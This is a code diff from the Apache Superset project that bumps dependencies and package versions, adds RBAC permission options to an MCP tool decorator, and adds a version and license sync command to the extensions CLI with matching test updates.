    # -c requirements/base-constraint.txt
    #   apache-superset
-    #   fakeredis
+    #   py-key-value-aio
-    #   pydocket
referencing==0.36.2
    # via
    # -c requirements/base-constraint.txt
    #   jsonschema
    #   jsonschema-path
    #   jsonschema-specifications
-requests==2.32.4
+requests==2.33.0
    # via
    # -c requirements/base-constraint.txt
    #   docker
@@ -910,11 +893,13 @@ rich==13.9.4
    #   cyclopts
    #   fastmcp
    #   flask-limiter
-    #   pydocket
    #   rich-rst
-    #   typer
rich-rst==1.3.1
    # via cyclopts
+rison==2.0.0
+    # via
+    # -c requirements/base-constraint.txt
+    #   apache-superset
rpds-py==0.25.0
    # via
    # -c requirements/base-constraint.txt
@@ -944,8 +929,6 @@ setuptools==80.9.0
    #   pydata-google-auth
    #   zope-event
    #   zope-interface
-shellingham==1.5.4
-    # via typer
shillelagh==1.4.3
    # via
    # -c requirements/base-constraint.txt
@@ -973,7 +956,6 @@ sniffio==1.3.1
sortedcontainers==2.4.0
    # via
    # -c requirements/base-constraint.txt
-    #   fakeredis
    #   trio
sqlalchemy==1.4.54
    # via
@@ -1013,10 +995,14 @@ starlette==0.49.1
    # via mcp
statsd==4.0.1
    # via apache-superset
+syntaqlite==0.1.0
+    # via apache-superset
tabulate==0.9.0
    # via
    # -c requirements/base-constraint.txt
    #   apache-superset
+tomli-w==1.2.0
+    # via apache-superset-extensions-cli
tomlkit==0.13.3
    # via pylint
tqdm==4.67.1
@@ -1034,8 +1020,6 @@ trio-websocket==0.12.2
    # via
    # -c requirements/base-constraint.txt
    #   selenium
-typer==0.20.0
-    # via pydocket
typing-extensions==4.15.0
    # via
    # -c requirements/base-constraint.txt
@@ -1048,16 +1032,14 @@ typing-extensions==4.15.0
    #   limits
    #   mcp
    #   opentelemetry-api
-    #   py-key-value-shared
+    #   py-key-value-aio
    #   pydantic
    #   pydantic-core
-    #   pydocket
    #   pyopenssl
    #   referencing
    #   selenium
    #   shillelagh
    #   starlette
-    #   typer
    #   typing-inspection
typing-inspection==0.4.1
    # via
@@ -1072,6 +1054,8 @@ tzdata==2025.2
    #   pandas
tzlocal==5.2
    # via trino
+uncalled-for==0.2.0
+    # via fastmcp
url-normalize==2.2.1
    # via
    # -c requirements/base-constraint.txt
@@ -1101,6 +1085,8 @@ watchdog==6.0.0
    # -c requirements/base-constraint.txt
    #   apache-superset
    #   apache-superset-extensions-cli
+watchfiles==1.1.1
+    # via fastmcp
wcwidth==0.2.13
    # via
    # -c requirements/base-constraint.txt
@@ -18,20 +18,20 @@

[project]
name = "apache-superset-core"
-version = "0.1.0rc1"
+version = "0.1.0rc2"
description = "Core Python package for building Apache Superset backend extensions and integrations"
readme = "README.md"
authors = [
    { name = "Apache Software Foundation", email = "dev@superset.apache.org" },
]
-license = { file="LICENSE.txt" }
+license = "Apache-2.0"
+license-files = ["LICENSE.txt"]
requires-python = ">=3.10"
keywords = ["superset", "apache", "analytics", "business-intelligence", "extensions", "visualization"]
classifiers = [
    "Development Status :: 3 - Alpha",
    "Environment :: Web Environment",
    "Intended Audience :: Developers",
    "License :: OSI Approved :: Apache Software License",
    "Operating System :: OS Independent",
    "Programming Language :: Python :: 3",
    "Programming Language :: Python :: 3.10",
@@ -37,6 +37,13 @@ Usage:

from typing import Any, Callable, TypeVar

+try:
+    from mcp.types import ToolAnnotations
+except (
+    ImportError
+):  # MCP extras may not be installed in superset-core-only environments
+    ToolAnnotations = dict
+
# Type variable for decorated functions
F = TypeVar("F", bound=Callable[..., Any])

@@ -48,11 +55,15 @@ def tool(
    description: str | None = None,
    tags: list[str] | None = None,
    protect: bool = True,
+    class_permission_name: str | None = None,
+    method_permission_name: str | None = None,
+    annotations: ToolAnnotations | None = None,
) -> Any:  # Use Any to avoid mypy issues with dependency injection
    """
    Decorator to register an MCP tool with optional authentication.

-    This decorator combines FastMCP tool registration with optional authentication.
+    This decorator combines FastMCP tool registration with optional authentication
+    and RBAC permission checking.

    Can be used as:
        @tool
@@ -69,6 +80,13 @@ def tool(
        description: Tool description (defaults to function docstring)
        tags: List of tags for categorizing the tool (defaults to empty list)
        protect: Whether to require Superset authentication (defaults to True)
+        class_permission_name: FAB view/resource name for RBAC checking
+            (e.g., "Chart", "Dashboard", "SQLLab"). When set, enables
+            permission checking via security_manager.can_access().
+        method_permission_name: FAB action name (e.g., "read", "write").
+            Defaults to "write" if tags includes "mutate", else "read".
+        annotations: MCP tool annotations (title, readOnlyHint, destructiveHint, etc.)
+            These hints help MCP clients understand tool behavior and safety.

    Returns:
        Decorator function that registers and wraps the tool, or the wrapped function
@@ -90,6 +108,18 @@ def tool(
        def public_tool() -> str:
            '''Public tool accessible without auth'''
            return "Hello world"
+
+        @tool(class_permission_name="Chart")  # RBAC: requires can_read on Chart
+        def list_charts() -> list:
+            '''List charts the user can access'''
+            return []
+
+        @tool(  # RBAC: can_write on Chart
+            tags=["mutate"], class_permission_name="Chart",
+        )
+        def create_chart(name: str) -> dict:
+            '''Create a new chart'''
+            return {"name": name}
    """
    raise NotImplementedError(
        "MCP tool decorator not initialized. "
@@ -158,4 +188,5 @@ def prompt(
__all__ = [
    "tool",
    "prompt",
+    "ToolAnnotations",
]
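The new `annotations` parameter is only described in the docstring above, so here is a hedged sketch of passing MCP tool annotations (field names follow `mcp.types.ToolAnnotations`; the tool itself is invented for illustration):

```python
from mcp.types import ToolAnnotations  # falls back to dict without MCP extras

# Hypothetical tool registration using the new annotations parameter.
@tool(
    class_permission_name="Dashboard",  # RBAC: requires can_read on Dashboard
    annotations=ToolAnnotations(
        title="List dashboards",
        readOnlyHint=True,       # the tool does not mutate state
        destructiveHint=False,   # safe for clients to call freely
    ),
)
def list_dashboards() -> list:
    """List dashboards the current user can access."""
    return []
```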
superset-embedded-sdk/package-lock.json (generated, 88 lines changed)
@@ -7025,9 +7025,9 @@
      "dev": true
    },
    "node_modules/picomatch": {
-      "version": "2.3.1",
-      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz",
-      "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==",
+      "version": "2.3.2",
+      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz",
+      "integrity": "sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==",
      "dev": true,
      "engines": {
        "node": ">=8.6"
@@ -7121,15 +7121,6 @@
        }
      ]
    },
-    "node_modules/randombytes": {
-      "version": "2.1.0",
-      "resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.1.0.tgz",
-      "integrity": "sha512-vYl3iOX+4CKUWuxGi9Ukhie6fsqXqS9FE2Zaic4tNFD2N2QQaXOMFbuKK4QmDHC0JO6B1Zp41J0LpT0oR68amQ==",
-      "dev": true,
-      "dependencies": {
-        "safe-buffer": "^5.1.0"
-      }
-    },
    "node_modules/react-is": {
      "version": "18.3.1",
      "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz",
@@ -7306,26 +7297,6 @@
        "node": ">=10"
      }
    },
-    "node_modules/safe-buffer": {
-      "version": "5.2.1",
-      "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz",
-      "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==",
-      "dev": true,
-      "funding": [
-        {
-          "type": "github",
-          "url": "https://github.com/sponsors/feross"
-        },
-        {
-          "type": "patreon",
-          "url": "https://www.patreon.com/feross"
-        },
-        {
-          "type": "consulting",
-          "url": "https://feross.org/support"
-        }
-      ]
-    },
    "node_modules/schema-utils": {
      "version": "4.3.3",
      "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.3.tgz",
@@ -7355,15 +7326,6 @@
      "semver": "bin/semver.js"
      }
    },
-    "node_modules/serialize-javascript": {
-      "version": "6.0.2",
-      "resolved": "https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-6.0.2.tgz",
-      "integrity": "sha512-Saa1xPByTTq2gdeFZYLLo+RFE35NHZkAbqZeWNd3BpzppeVisAqpDjcp8dyf6uIvEqJRd46jemmyA4iFIeVk8g==",
-      "dev": true,
-      "dependencies": {
-        "randombytes": "^2.1.0"
-      }
-    },
    "node_modules/shallow-clone": {
      "version": "3.0.1",
      "resolved": "https://registry.npmjs.org/shallow-clone/-/shallow-clone-3.0.1.tgz",
@@ -7590,15 +7552,14 @@
      }
    },
    "node_modules/terser-webpack-plugin": {
-      "version": "5.3.16",
-      "resolved": "https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.3.16.tgz",
-      "integrity": "sha512-h9oBFCWrq78NyWWVcSwZarJkZ01c2AyGrzs1crmHZO3QUg9D61Wu4NPjBy69n7JqylFF5y+CsUZYmYEIZ3mR+Q==",
+      "version": "5.4.0",
+      "resolved": "https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.4.0.tgz",
+      "integrity": "sha512-Bn5vxm48flOIfkdl5CaD2+1CiUVbonWQ3KQPyP7/EuIl9Gbzq/gQFOzaMFUEgVjB1396tcK0SG8XcNJ/2kDH8g==",
      "dev": true,
      "dependencies": {
        "@jridgewell/trace-mapping": "^0.3.25",
        "jest-worker": "^27.4.5",
        "schema-utils": "^4.3.0",
-        "serialize-javascript": "^6.0.2",
        "terser": "^5.31.1"
      },
      "engines": {
@@ -13159,9 +13120,9 @@
      "dev": true
    },
    "picomatch": {
-      "version": "2.3.1",
-      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz",
-      "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==",
+      "version": "2.3.2",
+      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz",
+      "integrity": "sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==",
      "dev": true
    },
    "pify": {
@@ -13220,15 +13181,6 @@
      "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==",
      "dev": true
    },
-    "randombytes": {
-      "version": "2.1.0",
-      "resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.1.0.tgz",
-      "integrity": "sha512-vYl3iOX+4CKUWuxGi9Ukhie6fsqXqS9FE2Zaic4tNFD2N2QQaXOMFbuKK4QmDHC0JO6B1Zp41J0LpT0oR68amQ==",
-      "dev": true,
-      "requires": {
-        "safe-buffer": "^5.1.0"
-      }
-    },
    "react-is": {
      "version": "18.3.1",
      "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz",
@@ -13359,12 +13311,6 @@
      "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==",
      "dev": true
    },
-    "safe-buffer": {
-      "version": "5.2.1",
-      "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz",
-      "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==",
-      "dev": true
-    },
    "schema-utils": {
      "version": "4.3.3",
      "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.3.tgz",
@@ -13383,15 +13329,6 @@
      "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==",
      "dev": true
    },
-    "serialize-javascript": {
-      "version": "6.0.2",
-      "resolved": "https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-6.0.2.tgz",
-      "integrity": "sha512-Saa1xPByTTq2gdeFZYLLo+RFE35NHZkAbqZeWNd3BpzppeVisAqpDjcp8dyf6uIvEqJRd46jemmyA4iFIeVk8g==",
-      "dev": true,
-      "requires": {
-        "randombytes": "^2.1.0"
-      }
-    },
    "shallow-clone": {
      "version": "3.0.1",
      "resolved": "https://registry.npmjs.org/shallow-clone/-/shallow-clone-3.0.1.tgz",
@@ -13563,15 +13500,14 @@
      }
    },
    "terser-webpack-plugin": {
-      "version": "5.3.16",
-      "resolved": "https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.3.16.tgz",
-      "integrity": "sha512-h9oBFCWrq78NyWWVcSwZarJkZ01c2AyGrzs1crmHZO3QUg9D61Wu4NPjBy69n7JqylFF5y+CsUZYmYEIZ3mR+Q==",
+      "version": "5.4.0",
+      "resolved": "https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.4.0.tgz",
+      "integrity": "sha512-Bn5vxm48flOIfkdl5CaD2+1CiUVbonWQ3KQPyP7/EuIl9Gbzq/gQFOzaMFUEgVjB1396tcK0SG8XcNJ/2kDH8g==",
      "dev": true,
      "requires": {
        "@jridgewell/trace-mapping": "^0.3.25",
        "jest-worker": "^27.4.5",
        "schema-utils": "^4.3.0",
-        "serialize-javascript": "^6.0.2",
        "terser": "^5.31.1"
      }
    },
@@ -17,20 +17,20 @@

[project]
name = "apache-superset-extensions-cli"
-version = "0.1.0rc1"
+version = "0.1.0rc2"
description = "Official command-line interface for building, bundling, and managing Apache Superset extensions"
readme = "README.md"
authors = [
    { name = "Apache Software Foundation", email = "dev@superset.apache.org" },
]
-license = { file="LICENSE.txt" }
+license = "Apache-2.0"
+license-files = ["LICENSE.txt"]
requires-python = ">=3.10"
keywords = ["superset", "apache", "cli", "extensions", "analytics", "business-intelligence", "development-tools"]
classifiers = [
    "Development Status :: 3 - Alpha",
    "Environment :: Console",
    "Intended Audience :: Developers",
    "License :: OSI Approved :: Apache Software License",
    "Operating System :: OS Independent",
    "Programming Language :: Python :: 3",
    "Programming Language :: Python :: 3.10",
@@ -49,6 +49,7 @@ dependencies = [
    "jinja2>=3.1.6",
    "semver>=3.0.4",
    "tomli>=2.2.1; python_version < '3.11'",
+    "tomli-w>=1.2.0",
    "watchdog>=6.0.0",
]
@@ -50,6 +50,8 @@ from superset_extensions_cli.utils import (
    validate_display_name,
    validate_publisher,
    validate_technical_name,
+    write_json,
+    write_toml,
)

REMOTE_ENTRY_REGEX = re.compile(r"^remoteEntry\..+\.js$")
@@ -292,6 +294,7 @@ def app() -> None:

@app.command()
def validate() -> None:
+    """Validate the extension structure and metadata consistency."""
    validate_npm()

    cwd = Path.cwd()
@@ -372,12 +375,167 @@ def validate() -> None:
        click.secho(" Convention requires: frontend/src/index.tsx", fg="yellow")
        sys.exit(1)

+    # Validate version and license consistency across extension.json, frontend, and backend
+    mismatches: list[str] = []
+    frontend_pkg_path = cwd / "frontend" / "package.json"
+    frontend_pkg = None
+    if frontend_pkg_path.is_file():
+        frontend_pkg = read_json(frontend_pkg_path)
+        if frontend_pkg:
+            if frontend_pkg.get("version") != extension.version:
+                mismatches.append(
+                    f" frontend/package.json version: {frontend_pkg.get('version')} "
+                    f"(expected {extension.version})"
+                )
+            if extension.license and frontend_pkg.get("license") != extension.license:
+                mismatches.append(
+                    f" frontend/package.json license: {frontend_pkg.get('license')} "
+                    f"(expected {extension.license})"
+                )
+
+    backend_pyproject_path = cwd / "backend" / "pyproject.toml"
+    if backend_pyproject_path.is_file():
+        backend_pyproject = read_toml(backend_pyproject_path)
+        if backend_pyproject:
+            project = backend_pyproject.get("project", {})
+            if project.get("version") != extension.version:
+                mismatches.append(
+                    f" backend/pyproject.toml version: {project.get('version')} "
+                    f"(expected {extension.version})"
+                )
+            if extension.license and project.get("license") != extension.license:
+                mismatches.append(
+                    f" backend/pyproject.toml license: {project.get('license')} "
+                    f"(expected {extension.license})"
+                )
+
+    if mismatches:
+        click.secho("❌ Metadata mismatch detected:", err=True, fg="red")
+        for mismatch in mismatches:
+            click.secho(mismatch, err=True, fg="red")
+        click.secho(
+            "Run `superset-extensions update` to sync from extension.json.",
+            fg="yellow",
+        )
+        sys.exit(1)
+
    click.secho("✅ Validation successful", fg="green")


+@app.command()
+@click.option(
+    "--version",
+    "version_opt",
+    is_flag=False,
+    flag_value="__prompt__",
+    default=None,
+    help="Set a new version. Prompts for value if none given.",
+)
+@click.option(
+    "--license",
+    "license_opt",
+    is_flag=False,
+    flag_value="__prompt__",
+    default=None,
+    help="Set a new license. Prompts for value if none given.",
+)
+def update(version_opt: str | None, license_opt: str | None) -> None:
+    """Update derived and generated files in the extension project."""
+    cwd = Path.cwd()
+
+    extension_json_path = cwd / "extension.json"
+    extension_data = read_json(extension_json_path)
+    if not extension_data:
+        click.secho("❌ extension.json not found.", err=True, fg="red")
+        sys.exit(1)
+
+    try:
+        extension = ExtensionConfig.model_validate(extension_data)
+    except Exception as e:
+        click.secho(f"❌ Invalid extension.json: {e}", err=True, fg="red")
+        sys.exit(1)
+
+    # Resolve version: prompt if flag used without value
+    if version_opt == "__prompt__":
+        version_opt = click.prompt("Version", default=extension.version)
+    target_version = (
+        version_opt
+        if version_opt and version_opt != extension.version
+        else extension.version
+    )
+
+    # Resolve license: prompt if flag used without value
+    if license_opt == "__prompt__":
+        license_opt = click.prompt("License", default=extension.license or "")
+    target_license = (
+        license_opt
+        if license_opt and license_opt != extension.license
+        else extension.license
+    )
+
+    updated: list[str] = []
+
+    # Update extension.json if version or license changed
+    ext_changed = False
+    if version_opt and version_opt != extension.version:
+        extension_data["version"] = target_version
+        ext_changed = True
+    if license_opt and license_opt != extension.license:
+        extension_data["license"] = target_license
+        ext_changed = True
+    if ext_changed:
+        try:
+            ExtensionConfig.model_validate(extension_data)
+        except Exception as e:
+            click.secho(f"❌ Invalid value: {e}", err=True, fg="red")
+            sys.exit(1)
+        write_json(extension_json_path, extension_data)
+        updated.append("extension.json")
+
+    # Update frontend/package.json
+    frontend_pkg_path = cwd / "frontend" / "package.json"
+    if frontend_pkg_path.is_file():
+        frontend_pkg = read_json(frontend_pkg_path)
+        if frontend_pkg:
+            pkg_changed = False
+            if frontend_pkg.get("version") != target_version:
+                frontend_pkg["version"] = target_version
+                pkg_changed = True
+            if target_license and frontend_pkg.get("license") != target_license:
+                frontend_pkg["license"] = target_license
+                pkg_changed = True
+            if pkg_changed:
+                write_json(frontend_pkg_path, frontend_pkg)
+                updated.append("frontend/package.json")
+
+    # Update backend/pyproject.toml
+    backend_pyproject_path = cwd / "backend" / "pyproject.toml"
+    if backend_pyproject_path.is_file():
+        backend_pyproject = read_toml(backend_pyproject_path)
+        if backend_pyproject:
+            project = backend_pyproject.setdefault("project", {})
+            toml_changed = False
+            if project.get("version") != target_version:
+                project["version"] = target_version
+                toml_changed = True
+            if target_license and project.get("license") != target_license:
+                project["license"] = target_license
+                toml_changed = True
+            if toml_changed:
+                write_toml(backend_pyproject_path, backend_pyproject)
+                updated.append("backend/pyproject.toml")
+
+    if updated:
+        for path in updated:
+            click.secho(f"✅ Updated {path}", fg="green")
+    else:
+        click.secho("✅ All files already up to date.", fg="green")


@app.command()
@click.pass_context
def build(ctx: click.Context) -> None:
    """Build extension assets."""
    ctx.invoke(validate)
    cwd = Path.cwd()
    frontend_dir = cwd / "frontend"
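To see the new `update` command end to end, a hedged sketch using Click's test runner (this mirrors the tests added later in this change; the output text is the command's own):

```python
from click.testing import CliRunner
from superset_extensions_cli.cli import app

# Bump the version in extension.json, then let `update` sync
# frontend/package.json and backend/pyproject.toml from it.
runner = CliRunner()
result = runner.invoke(app, ["update", "--version", "2.0.0"])
print(result.output)  # e.g. "✅ Updated extension.json" plus the synced files
```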
@@ -413,6 +571,7 @@ def build(ctx: click.Context) -> None:
)
@click.pass_context
def bundle(ctx: click.Context, output: Path | None) -> None:
+    """Package the extension into a .supx file."""
    ctx.invoke(build)

    cwd = Path.cwd()
@@ -426,9 +585,9 @@ def bundle(ctx: click.Context, output: Path | None) -> None:
        sys.exit(1)

    manifest = json.loads(manifest_path.read_text())
-    id_ = manifest["id"]
+    name = manifest["name"]
    version = manifest["version"]
-    default_filename = f"{id_}-{version}.supx"
+    default_filename = f"{name}-{version}.supx"

    if output is None:
        zip_path = Path(default_filename)
@@ -453,6 +612,7 @@ def bundle(ctx: click.Context, output: Path | None) -> None:
@app.command()
@click.pass_context
def dev(ctx: click.Context) -> None:
+    """Automatically rebuild the extension as files change."""
    cwd = Path.cwd()
    frontend_dir = cwd / "frontend"
    backend_dir = cwd / "backend"
@@ -647,6 +807,7 @@ def init(
    frontend_opt: bool | None,
    backend_opt: bool | None,
) -> None:
+    """Scaffold a new extension project."""
    # Get extension names with graceful validation
    names = prompt_for_extension_info(display_name_opt, publisher_opt, name_opt)

@@ -663,7 +824,7 @@ def init(
        else click.confirm("Include backend?", default=True)
    )

-    target_dir = Path.cwd() / names["id"]
+    target_dir = Path.cwd() / names["name"]
    if target_dir.exists():
        click.secho(f"❌ Directory {target_dir} already exists.", fg="red")
        sys.exit(1)
@@ -686,7 +847,7 @@ def init(
    click.secho("✅ Created extension.json", fg="green")

    # Create .gitignore
-    gitignore = env.get_template(".gitignore.j2").render(ctx)
+    gitignore = env.get_template("gitignore.j2").render(ctx)
    (target_dir / ".gitignore").write_text(gitignore)
    click.secho("✅ Created .gitignore", fg="green")
@@ -21,6 +21,8 @@ import sys
from pathlib import Path
from typing import Any

+import tomli_w
+
from superset_core.extensions.constants import (
    DISPLAY_NAME_PATTERN,
    PUBLISHER_PATTERN,
@@ -109,6 +111,14 @@ def read_json(path: Path) -> dict[str, Any] | None:
    return json.loads(path.read_text())


+def write_json(path: Path, data: dict[str, Any]) -> None:
+    path.write_text(json.dumps(data, indent=2) + "\n")
+
+
+def write_toml(path: Path, data: dict[str, Any]) -> None:
+    path.write_text(tomli_w.dumps(data))
+
+
def _normalize_for_identifiers(name: str) -> str:
    """
    Normalize display name to clean lowercase words.
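A small hedged round-trip for the new helpers (the paths and payload are illustrative):

```python
from pathlib import Path

data = {"project": {"name": "demo-extension", "version": "0.1.0"}}
write_toml(Path("backend/pyproject.toml"), data)          # serialized via tomli_w
assert read_toml(Path("backend/pyproject.toml")) == data  # assumes the existing read_toml helper
```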
@@ -17,10 +17,12 @@

from __future__ import annotations

import json
import os
from pathlib import Path

import pytest
+import tomli_w
from click.testing import CliRunner

@@ -138,3 +140,69 @@ def extension_setup_for_bundling():
        (backend_dir / "__init__.py").write_text("# init")

    return _setup
+
+
+@pytest.fixture
+def extension_with_versions():
+    """Create an extension directory structure with configurable versions and licenses."""
+
+    def _create(
+        base_path: Path,
+        ext_version: str = "1.0.0",
+        frontend_version: str | None = None,
+        backend_version: str | None = None,
+        ext_license: str | None = "Apache-2.0",
+        frontend_license: str | None = None,
+        backend_license: str | None = None,
+    ) -> None:
+        extension_json = {
+            "publisher": "test-org",
+            "name": "test-extension",
+            "displayName": "Test Extension",
+            "version": ext_version,
+            "permissions": [],
+        }
+        if ext_license is not None:
+            extension_json["license"] = ext_license
+        (base_path / "extension.json").write_text(json.dumps(extension_json))
+
+        if frontend_version is not None:
+            frontend_dir = base_path / "frontend"
+            frontend_dir.mkdir(exist_ok=True)
+            (frontend_dir / "src").mkdir(exist_ok=True)
+            (frontend_dir / "src" / "index.tsx").write_text("// entry")
+            pkg = {
+                "name": "@test-org/test-extension",
+                "version": frontend_version,
+            }
+            if frontend_license is not None:
+                pkg["license"] = frontend_license
+            elif ext_license is not None:
+                pkg["license"] = ext_license
+            (frontend_dir / "package.json").write_text(json.dumps(pkg, indent=2))
+
+        if backend_version is not None:
+            backend_dir = base_path / "backend"
+            backend_dir.mkdir(exist_ok=True)
+            src_dir = backend_dir / "src" / "test_org" / "test_extension"
+            src_dir.mkdir(parents=True, exist_ok=True)
+            (src_dir / "entrypoint.py").write_text("# entry")
+            project = {
+                "name": "test-org-test-extension",
+                "version": backend_version,
+            }
+            if backend_license is not None:
+                project["license"] = backend_license
+            elif ext_license is not None:
+                project["license"] = ext_license
+            pyproject = {
+                "project": project,
+                "tool": {
+                    "apache_superset_extensions": {
+                        "build": {"include": ["src/**/*.py"]}
+                    }
+                },
+            }
+            (backend_dir / "pyproject.toml").write_text(tomli_w.dumps(pyproject))
+
+    return _create
@@ -121,7 +121,7 @@ def test_build_command_success_flow(
    # Setup mocks
    mock_rebuild_frontend.return_value = "remoteEntry.abc123.js"
    mock_read_toml.return_value = {
-        "project": {"name": "test"},
+        "project": {"name": "test", "version": "1.0.0"},
        "tool": {
            "apache_superset_extensions": {
                "build": {"include": ["src/test_org/test_extension/**/*.py"]}
@@ -162,7 +162,7 @@ def test_build_command_handles_frontend_build_failure(
    # Setup mocks
    mock_rebuild_frontend.return_value = None  # Indicates failure
    mock_read_toml.return_value = {
-        "project": {"name": "test"},
+        "project": {"name": "test", "version": "1.0.0"},
        "tool": {
            "apache_superset_extensions": {
                "build": {"include": ["src/test_org/test_extension/**/*.py"]}
@@ -43,10 +43,10 @@ def test_bundle_command_creates_zip_with_default_name(
    result = cli_runner.invoke(app, ["bundle"])

    assert result.exit_code == 0
-    assert "✅ Bundle created: test-org.test-extension-1.0.0.supx" in result.output
+    assert "✅ Bundle created: test-extension-1.0.0.supx" in result.output

    # Verify zip file was created
-    zip_path = isolated_filesystem / "test-org.test-extension-1.0.0.supx"
+    zip_path = isolated_filesystem / "test-extension-1.0.0.supx"
    assert_file_exists(zip_path)

    # Verify zip contents
@@ -100,7 +100,7 @@ def test_bundle_command_with_output_directory(
    assert result.exit_code == 0

    # Verify zip file was created in output directory
-    expected_path = output_dir / "test-org.test-extension-1.0.0.supx"
+    expected_path = output_dir / "test-extension-1.0.0.supx"
    assert_file_exists(expected_path)
    assert f"✅ Bundle created: {expected_path}" in result.output

@@ -193,7 +193,7 @@ def test_bundle_includes_all_files_recursively(
    assert result.exit_code == 0

    # Verify zip file and contents
-    zip_path = isolated_filesystem / "complex-org.complex-extension-2.1.0.supx"
+    zip_path = isolated_filesystem / "complex-extension-2.1.0.supx"
    assert_file_exists(zip_path)

    with zipfile.ZipFile(zip_path, "r") as zipf:

@@ -48,12 +48,12 @@ def test_init_creates_extension_with_both_frontend_and_backend(
    )

    # Verify directory structure
-    extension_path = isolated_filesystem / "test-org.test-extension"
+    extension_path = isolated_filesystem / "test-extension"
    assert_directory_exists(extension_path, "main extension directory")

    expected_structure = create_test_extension_structure(
        isolated_filesystem,
-        "test-org.test-extension",
+        "test-extension",
        include_frontend=True,
        include_backend=True,
    )
@@ -74,7 +74,7 @@ def test_init_creates_extension_with_frontend_only(

    assert result.exit_code == 0, f"Command failed with output: {result.output}"

-    extension_path = isolated_filesystem / "test-org.test-extension"
+    extension_path = isolated_filesystem / "test-extension"
    assert_directory_exists(extension_path)

    # Should have frontend directory and package.json
@@ -97,7 +97,7 @@ def test_init_creates_extension_with_backend_only(

    assert result.exit_code == 0, f"Command failed with output: {result.output}"

-    extension_path = isolated_filesystem / "test-org.test-extension"
+    extension_path = isolated_filesystem / "test-extension"
    assert_directory_exists(extension_path)

    # Should have backend directory and pyproject.toml
@@ -120,7 +120,7 @@ def test_init_creates_extension_with_neither_frontend_nor_backend(

    assert result.exit_code == 0, f"Command failed with output: {result.output}"

-    extension_path = isolated_filesystem / "test-org.test-extension"
+    extension_path = isolated_filesystem / "test-extension"
    assert_directory_exists(extension_path)

    # Should only have extension.json
@@ -138,8 +138,8 @@ def test_init_accepts_valid_display_name(cli_runner, isolated_filesystem):
    result = cli_runner.invoke(app, ["init"], input=cli_input)

    assert result.exit_code == 0, f"Should accept display name: {result.output}"
-    assert Path("test-org.my-awesome-extension").exists(), (
-        "Directory for generated composite ID should be created"
+    assert Path("my-awesome-extension").exists(), (
+        "Directory with extension name should be created"
    )

@@ -152,23 +152,21 @@ def test_init_accepts_mixed_alphanumeric_name(cli_runner, isolated_filesystem):
    assert result.exit_code == 0, (
        f"Mixed alphanumeric display name should be valid: {result.output}"
    )
-    assert Path("test-org.tool-123").exists(), (
-        "Directory for 'test-org.tool-123' should be created"
-    )
+    assert Path("tool-123").exists(), "Directory for 'tool-123' should be created"


@pytest.mark.cli
@pytest.mark.parametrize(
-    "display_name,expected_id",
+    "display_name,expected_dir",
    [
-        ("Test Extension", "test-org.test-extension"),
-        ("My Tool v2", "test-org.my-tool-v2"),
-        ("Dashboard Helper", "test-org.dashboard-helper"),
-        ("Chart Builder Pro", "test-org.chart-builder-pro"),
+        ("Test Extension", "test-extension"),
+        ("My Tool v2", "my-tool-v2"),
+        ("Dashboard Helper", "dashboard-helper"),
+        ("Chart Builder Pro", "chart-builder-pro"),
    ],
)
-def test_init_with_various_display_names(cli_runner, display_name, expected_id):
-    """Test that init accepts various display names and generates proper IDs."""
+def test_init_with_various_display_names(cli_runner, display_name, expected_dir):
+    """Test that init accepts various display names and creates directory named after extension."""
    with cli_runner.isolated_filesystem():
        cli_input = f"{display_name}\n\ntest-org\n0.1.0\nApache-2.0\ny\ny\n"
        result = cli_runner.invoke(app, ["init"], input=cli_input)
@@ -176,8 +174,8 @@ def test_init_with_various_display_names(cli_runner, display_name, expected_dir):
    assert result.exit_code == 0, (
        f"Valid display name '{display_name}' was rejected: {result.output}"
    )
-    assert Path(expected_id).exists(), (
-        f"Directory for '{expected_id}' was not created"
+    assert Path(expected_dir).exists(), (
+        f"Directory '{expected_dir}' was not created"
    )

